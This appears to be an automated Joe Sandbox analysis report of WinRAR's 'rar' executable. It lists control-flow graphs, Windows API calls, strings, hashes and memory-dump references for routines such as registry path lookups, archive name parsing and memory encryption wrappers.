                                                        control_flow_graph 635 7ff7f7ec3ea8-7ff7f7ec3f03 call 7ff7f7eda5a0 call 7ff7f7edc8a0 640 7ff7f7ec3f40-7ff7f7ec3f50 call 7ff7f7eca9e8 635->640 641 7ff7f7ec3f05-7ff7f7ec3f3e GetModuleFileNameW call 7ff7f7eb4e14 call 7ff7f7eca9c0 635->641 644 7ff7f7ec3f55-7ff7f7ec3f79 call 7ff7f7ea1874 call 7ff7f7ea1e80 640->644 641->644 652 7ff7f7ec4692-7ff7f7ec46c5 call 7ff7f7ea18ac call 7ff7f7eda610 644->652 653 7ff7f7ec3f7f-7ff7f7ec3f89 644->653 655 7ff7f7ec3fae-7ff7f7ec3feb call 7ff7f7edec70 * 2 653->655 656 7ff7f7ec3f8b-7ff7f7ec3fac call 7ff7f7ec11c0 * 2 653->656 668 7ff7f7ec3fef-7ff7f7ec3ff3 655->668 656->655 669 7ff7f7ec40f2-7ff7f7ec4112 call 7ff7f7ea22e0 call 7ff7f7edeb90 668->669 670 7ff7f7ec3ff9-7ff7f7ec402d call 7ff7f7ea2440 call 7ff7f7ea2150 668->670 669->652 679 7ff7f7ec4118-7ff7f7ec4131 call 7ff7f7ea2150 669->679 680 7ff7f7ec4033 670->680 681 7ff7f7ec40bc-7ff7f7ec40e2 call 7ff7f7ea22e0 670->681 691 7ff7f7ec4133-7ff7f7ec4136 679->691 692 7ff7f7ec4138-7ff7f7ec414b call 7ff7f7edeb90 679->692 683 7ff7f7ec403a-7ff7f7ec403e 680->683 681->668 694 7ff7f7ec40e8-7ff7f7ec40ec 681->694 686 7ff7f7ec4040-7ff7f7ec4044 683->686 687 7ff7f7ec4064-7ff7f7ec4069 683->687 686->687 693 7ff7f7ec4046-7ff7f7ec405e call 7ff7f7ee2290 686->693 689 7ff7f7ec4097-7ff7f7ec409f 687->689 690 7ff7f7ec406b-7ff7f7ec4070 687->690 696 7ff7f7ec40a1 689->696 697 7ff7f7ec40b7 689->697 690->689 695 7ff7f7ec4072-7ff7f7ec4078 690->695 698 7ff7f7ec416f-7ff7f7ec41b1 call 7ff7f7eca900 call 7ff7f7edeb90 691->698 692->652 708 7ff7f7ec4151-7ff7f7ec416c call 7ff7f7ecd54c call 7ff7f7edeb88 692->708 709 7ff7f7ec4060 693->709 710 7ff7f7ec40a3-7ff7f7ec40a7 693->710 694->652 694->669 702 7ff7f7ec4093 695->702 703 7ff7f7ec407a-7ff7f7ec4091 call 7ff7f7ee1700 695->703 696->683 697->681 717 7ff7f7ec41c0-7ff7f7ec41d5 698->717 718 7ff7f7ec41b3-7ff7f7ec41bb call 7ff7f7edeb88 698->718 702->689 703->702 715 7ff7f7ec40a9-7ff7f7ec40b5 703->715 708->698 709->687 710->697 715->681 721 7ff7f7ec45f0-7ff7f7ec4624 call 7ff7f7ec3884 call 7ff7f7edeb88 * 2 717->721 722 7ff7f7ec41db 717->722 718->652 759 7ff7f7ec4626-7ff7f7ec4648 call 7ff7f7ec11c0 * 2 721->759 760 7ff7f7ec464a-7ff7f7ec4691 call 7ff7f7edec70 * 2 721->760 726 7ff7f7ec41e1-7ff7f7ec41ee 722->726 728 7ff7f7ec41f4-7ff7f7ec41fa 726->728 729 7ff7f7ec4508-7ff7f7ec4513 726->729 732 7ff7f7ec4208-7ff7f7ec420e 728->732 733 7ff7f7ec41fc-7ff7f7ec4202 728->733 729->721 731 7ff7f7ec4519-7ff7f7ec4523 729->731 735 7ff7f7ec4585-7ff7f7ec4589 731->735 736 7ff7f7ec4525-7ff7f7ec452b 731->736 737 7ff7f7ec43d0-7ff7f7ec43e0 call 7ff7f7eca580 732->737 738 7ff7f7ec4214-7ff7f7ec425c 732->738 733->729 733->732 740 7ff7f7ec45a3-7ff7f7ec45d4 call 7ff7f7ec3884 735->740 741 7ff7f7ec458b-7ff7f7ec458f 735->741 743 7ff7f7ec4531-7ff7f7ec4539 736->743 744 7ff7f7ec45db-7ff7f7ec45de 736->744 755 7ff7f7ec44f0-7ff7f7ec4503 737->755 756 7ff7f7ec43e6-7ff7f7ec4414 call 7ff7f7eca9e8 call 7ff7f7ee172c 737->756 745 7ff7f7ec4261-7ff7f7ec4264 738->745 740->744 741->740 748 7ff7f7ec4591-7ff7f7ec4597 741->748 751 7ff7f7ec4573-7ff7f7ec457a 743->751 752 7ff7f7ec453b-7ff7f7ec453e 743->752 744->721 753 7ff7f7ec45e0-7ff7f7ec45e5 744->753 746 7ff7f7ec4268-7ff7f7ec4270 745->746 746->746 754 7ff7f7ec4272-7ff7f7ec4288 call 7ff7f7ee1700 746->754 748->744 758 7ff7f7ec4599-7ff7f7ec45a1 748->758 757 7ff7f7ec457e-7ff7f7ec4583 751->757 762 7ff7f7ec4540-7ff7f7ec4543 752->762 763 7ff7f7ec456a-7ff7f7ec4571 752->763 753->726 778 7ff7f7ec42a3 754->778 779 7ff7f7ec428a-7ff7f7ec4295 754->779 755->729 756->755 787 7ff7f7ec441a-7ff7f7ec44a9 call 7ff7f7ecd840 call 7ff7f7eca900 call 7ff7f7eca8c4 call 7ff7f7eca900 call 7ff7f7ee15fc 756->787 757->744 758->744 759->760 760->652 768 7ff7f7ec4561-7ff7f7ec4568 762->768 769 7ff7f7ec4545-7ff7f7ec4548 762->769 763->757 768->757 774 7ff7f7ec454a-7ff7f7ec454d 769->774 775 7ff7f7ec4558-7ff7f7ec455f 769->775 774->748 776 7ff7f7ec454f-7ff7f7ec4556 774->776 775->757 776->757 785 7ff7f7ec42a7-7ff7f7ec42be 778->785 779->778 783 7ff7f7ec4297-7ff7f7ec42a1 779->783 783->785 785->745 788 7ff7f7ec42c0-7ff7f7ec42c2 785->788 821 7ff7f7ec44bf-7ff7f7ec44cf 787->821 822 7ff7f7ec44ab-7ff7f7ec44bb 787->822 790 7ff7f7ec42e6 788->790 791 7ff7f7ec42c4-7ff7f7ec42d6 call 7ff7f7eca900 788->791 790->737 794 7ff7f7ec42ec 790->794 796 7ff7f7ec42db-7ff7f7ec42e1 791->796 797 7ff7f7ec42f1-7ff7f7ec42f7 794->797 799 7ff7f7ec45d6 796->799 800 7ff7f7ec4300-7ff7f7ec4303 797->800 801 7ff7f7ec42f9-7ff7f7ec42fe 797->801 799->744 800->797 801->800 802 7ff7f7ec4305-7ff7f7ec4314 801->802 804 7ff7f7ec4316-7ff7f7ec4320 802->804 805 7ff7f7ec433d-7ff7f7ec4347 802->805 807 7ff7f7ec4323-7ff7f7ec4327 804->807 808 7ff7f7ec45ea-7ff7f7ec45ef call 7ff7f7eda774 805->808 809 7ff7f7ec434d-7ff7f7ec4378 call 7ff7f7ecd840 805->809 807->805 812 7ff7f7ec4329-7ff7f7ec433b 807->812 808->721 819 7ff7f7ec437a-7ff7f7ec4399 call 7ff7f7ee1764 809->819 820 7ff7f7ec439e-7ff7f7ec43cb call 7ff7f7ec470c 809->820 812->805 812->807 819->796 820->796 825 7ff7f7ec44d2-7ff7f7ec44d8 821->825 822->821 828 7ff7f7ec44da-7ff7f7ec44e5 825->828 829 7ff7f7ec44eb-7ff7f7ec44ee 825->829 828->799 828->829 829->825
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: FileModuleNamesnprintfwcschr
                                                        • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                        • API String ID: 602362809-1645646101
                                                        • Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                        • Instruction ID: 1eb91ea678215838c3a3fdc5f31ae399f56bcd67d453d687ec2b07ca4f04104f
                                                        • Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                        • Instruction Fuzzy Hash: 5D22C22EA1868285EB20EB15D4406F9A761FF45788FC04137EA6F876D5EF3CE54AC390

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1405 7ff7f7e94fd0-7ff7f7e9502d call 7ff7f7eda5a0 1408 7ff7f7e9502f-7ff7f7e95037 1405->1408 1409 7ff7f7e9504d-7ff7f7e95055 1405->1409 1408->1409 1412 7ff7f7e95039-7ff7f7e9504b call 7ff7f7edc8a0 1408->1412 1410 7ff7f7e95057-7ff7f7e95069 call 7ff7f7e9481c 1409->1410 1411 7ff7f7e9506e-7ff7f7e95089 call 7ff7f7eb420c 1409->1411 1410->1411 1418 7ff7f7e9509f-7ff7f7e950b6 call 7ff7f7ecdb08 1411->1418 1419 7ff7f7e9508b-7ff7f7e9509d call 7ff7f7eca9c0 1411->1419 1412->1409 1412->1410 1424 7ff7f7e9511b-7ff7f7e95131 call 7ff7f7edc8a0 1418->1424 1425 7ff7f7e950b8-7ff7f7e950c3 call 7ff7f7eca59c 1418->1425 1419->1424 1430 7ff7f7e95203-7ff7f7e9520d call 7ff7f7ecaa48 1424->1430 1431 7ff7f7e95137-7ff7f7e9513e 1424->1431 1425->1424 1432 7ff7f7e950c5-7ff7f7e950cf call 7ff7f7ea3054 1425->1432 1440 7ff7f7e95212-7ff7f7e9521c 1430->1440 1433 7ff7f7e95140-7ff7f7e95167 call 7ff7f7eb3f98 1431->1433 1434 7ff7f7e9516c-7ff7f7e951be call 7ff7f7ecaa1c call 7ff7f7ecaa48 call 7ff7f7ec6e98 1431->1434 1432->1424 1441 7ff7f7e950d1-7ff7f7e95107 call 7ff7f7eca9e8 call 7ff7f7eca9c0 call 7ff7f7ea3054 1432->1441 1433->1434 1488 7ff7f7e951d3-7ff7f7e951e8 call 7ff7f7ec7a24 1434->1488 1443 7ff7f7e95222 1440->1443 1444 7ff7f7e952db-7ff7f7e952e0 1440->1444 1441->1424 1526 7ff7f7e95109-7ff7f7e95116 call 7ff7f7eca9e8 1441->1526 1449 7ff7f7e9532f-7ff7f7e95332 1443->1449 1450 7ff7f7e95228-7ff7f7e9522d 1443->1450 1445 7ff7f7e95453-7ff7f7e95477 call 7ff7f7e9f00c call 7ff7f7e9f230 call 7ff7f7e9f09c 1444->1445 1446 7ff7f7e952e6-7ff7f7e952e9 1444->1446 1506 7ff7f7e9547c-7ff7f7e95483 1445->1506 1454 7ff7f7e952ef-7ff7f7e952f2 1446->1454 1455 7ff7f7e95379-7ff7f7e95382 1446->1455 1452 7ff7f7e95334 1449->1452 1453 7ff7f7e9533b-7ff7f7e9533e 1449->1453 1450->1449 1458 7ff7f7e95233-7ff7f7e95236 1450->1458 1452->1453 1462 7ff7f7e95340 1453->1462 1463 7ff7f7e95347-7ff7f7e95358 call 7ff7f7e81230 call 7ff7f7e84858 1453->1463 1464 7ff7f7e952f4-7ff7f7e952f7 1454->1464 1465 7ff7f7e9536c-7ff7f7e95374 call 7ff7f7ec81cc 1454->1465 1460 7ff7f7e95388-7ff7f7e9538b 1455->1460 1461 7ff7f7e95449-7ff7f7e95451 call 7ff7f7ebeab8 1455->1461 1468 7ff7f7e95290-7ff7f7e95299 1458->1468 1469 7ff7f7e95238-7ff7f7e9523b 1458->1469 1471 7ff7f7e95391-7ff7f7e95397 1460->1471 1472 7ff7f7e9541b-7ff7f7e95433 call 7ff7f7ecab1c 1460->1472 1461->1506 1462->1463 1518 7ff7f7e9535d 1463->1518 1464->1445 1474 7ff7f7e952fd-7ff7f7e95300 1464->1474 1465->1506 1476 7ff7f7e952b2-7ff7f7e952bd 1468->1476 1477 7ff7f7e9529b-7ff7f7e9529e 1468->1477 1479 7ff7f7e95274-7ff7f7e9528b call 7ff7f7e81230 call 7ff7f7e848ec 1469->1479 1480 7ff7f7e9523d-7ff7f7e95240 1469->1480 1493 7ff7f7e95399-7ff7f7e9539c 1471->1493 1494 7ff7f7e9540c-7ff7f7e95419 call 7ff7f7eb54f8 call 7ff7f7eb51e4 1471->1494 1472->1506 1517 7ff7f7e95435-7ff7f7e95447 call 7ff7f7ebbbd4 1472->1517 1474->1449 1495 7ff7f7e95302-7ff7f7e95305 1474->1495 1487 7ff7f7e952ce-7ff7f7e952d6 call 7ff7f7eb55e0 1476->1487 1489 7ff7f7e952bf-7ff7f7e952c9 call 7ff7f7eca9e8 1476->1489 1486 7ff7f7e952a0-7ff7f7e952a6 1477->1486 1477->1487 1535 7ff7f7e9535e-7ff7f7e95362 call 7ff7f7e814fc 1479->1535 1480->1445 1497 7ff7f7e95246-7ff7f7e95249 1480->1497 1502 7ff7f7e95313-7ff7f7e9531d call 7ff7f7e9481c 1486->1502 1503 7ff7f7e952a8-7ff7f7e952ad call 7ff7f7e97214 1486->1503 1487->1506 1537 7ff7f7e951c0-7ff7f7e951ce call 7ff7f7ecaa48 1488->1537 1538 7ff7f7e951ea-7ff7f7e95201 call 7ff7f7ec6f68 call 7ff7f7e814c0 1488->1538 1489->1487 1509 7ff7f7e953ef-7ff7f7e95401 call 7ff7f7e945c8 1493->1509 1510 7ff7f7e9539e-7ff7f7e953a1 1493->1510 1494->1506 1511 7ff7f7e95322-7ff7f7e9532a call 7ff7f7ea67e0 1495->1511 1512 7ff7f7e95307-7ff7f7e9530a 1495->1512 1497->1449 1514 7ff7f7e9524f-7ff7f7e95252 1497->1514 1502->1506 1503->1506 1523 7ff7f7e95491-7ff7f7e954bc call 7ff7f7eda610 1506->1523 1524 7ff7f7e95485-7ff7f7e9548c call 7ff7f7e98444 1506->1524 1509->1494 1510->1502 1522 7ff7f7e953a7-7ff7f7e953d5 call 7ff7f7e945c8 call 7ff7f7ecab1c 1510->1522 1511->1506 1512->1445 1525 7ff7f7e95310 1512->1525 1514->1445 1529 7ff7f7e95258-7ff7f7e9525b 1514->1529 1517->1506 1518->1535 1522->1506 1561 7ff7f7e953db-7ff7f7e953ea call 7ff7f7ebba9c 1522->1561 1524->1523 1525->1502 1526->1424 1545 7ff7f7e9526b-7ff7f7e95272 1529->1545 1546 7ff7f7e9525d-7ff7f7e95260 1529->1546 1555 7ff7f7e95367 1535->1555 1537->1488 1538->1440 1545->1487 1546->1511 1547 7ff7f7e95266 1546->1547 1547->1525 1555->1506 1561->1506
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: wcschr
                                                        • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                        • API String ID: 1497570035-1281034975
                                                        • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                        • Instruction ID: f80c8fd247f82ea9e419ff1312be5a76a8a7f11d8a4ca8b6fdd0bbc20e1f6e9a
                                                        • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                        • Instruction Fuzzy Hash: 73C1B76AA1858280EB64BF25D8511FC9361EF46784FD44137E96F4A6DADE2CE503C3B0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1564 7ff7f7ec7f24-7ff7f7ec7f5c 1565 7ff7f7ec7fd0 1564->1565 1566 7ff7f7ec7f5e-7ff7f7ec7f64 1564->1566 1567 7ff7f7ec7fd7-7ff7f7ec7fea 1565->1567 1566->1565 1568 7ff7f7ec7f66-7ff7f7ec7f7c call 7ff7f7ecb3f0 1566->1568 1569 7ff7f7ec8036-7ff7f7ec8039 1567->1569 1570 7ff7f7ec7fec-7ff7f7ec7fef 1567->1570 1578 7ff7f7ec7fb5 1568->1578 1579 7ff7f7ec7f7e-7ff7f7ec7fb3 GetProcAddressForCaller GetProcAddress 1568->1579 1572 7ff7f7ec805c-7ff7f7ec8065 GetCurrentProcessId 1569->1572 1573 7ff7f7ec803b-7ff7f7ec804a 1569->1573 1570->1572 1574 7ff7f7ec7ff1-7ff7f7ec8000 1570->1574 1576 7ff7f7ec8077-7ff7f7ec8093 1572->1576 1577 7ff7f7ec8067 1572->1577 1584 7ff7f7ec804f-7ff7f7ec8051 1573->1584 1585 7ff7f7ec8005-7ff7f7ec8007 1574->1585 1582 7ff7f7ec8069-7ff7f7ec8075 1577->1582 1583 7ff7f7ec7fbc-7ff7f7ec7fce 1578->1583 1579->1583 1582->1576 1582->1582 1583->1567 1584->1576 1586 7ff7f7ec8053-7ff7f7ec805a 1584->1586 1585->1576 1587 7ff7f7ec8009 1585->1587 1588 7ff7f7ec8010-7ff7f7ec8034 call 7ff7f7e9ca6c call 7ff7f7e9cda4 call 7ff7f7e9ca40 1586->1588 1587->1588 1588->1576
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                        • API String ID: 1389829785-2207617598
                                                        • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                        • Instruction ID: da6b88fe4e7230d512935c389eee19f8d3bfc061d0c2a6e1a73c42d37511eb1e
                                                        • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                        • Instruction Fuzzy Hash: 89413B2DA08A8291FB15BB12A940575A7A1AF49BE4FC40132CC7E07BE4DE7CE453C3A5

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                        • String ID:
                                                        • API String ID: 552178382-0
                                                        • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                        • Instruction ID: 33de1975acc27ec0e11f5f9a9a7be28b241ae3ada2a4b42adfc5f2ebe130f186
                                                        • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                        • Instruction Fuzzy Hash: 10315219E0818341FB14BB2495913B9A391AF45784FC80436E67F0B6D3EE6CE80782F1

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC47DB
                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC4831
                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC4853
                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC48A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                        • String ID: LanguageFolder$Software\WinRAR\General
                                                        • API String ID: 1800380464-3408810217
                                                        • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                        • Instruction ID: 1eaf10367d5119c7677a3689614662126f4d6810b7d298ac69e12c55c99bc111
                                                        • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                        • Instruction Fuzzy Hash: 0F31E82A718A8141EB10EB25E8416F9A751FF85794FC04232EE6E47BD9EF6CD10AC750

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB43D1
                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB4402
                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB440D
                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB443E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CloseFileModuleNameOpenQueryValue
                                                        • String ID: AppData$Software\WinRAR\Paths
                                                        • API String ID: 3617018055-3415417297
                                                        • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                        • Instruction ID: 6e294513f190de905fc3ebc65963512200289f92f0a3c5cab2213f710d297744
                                                        • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
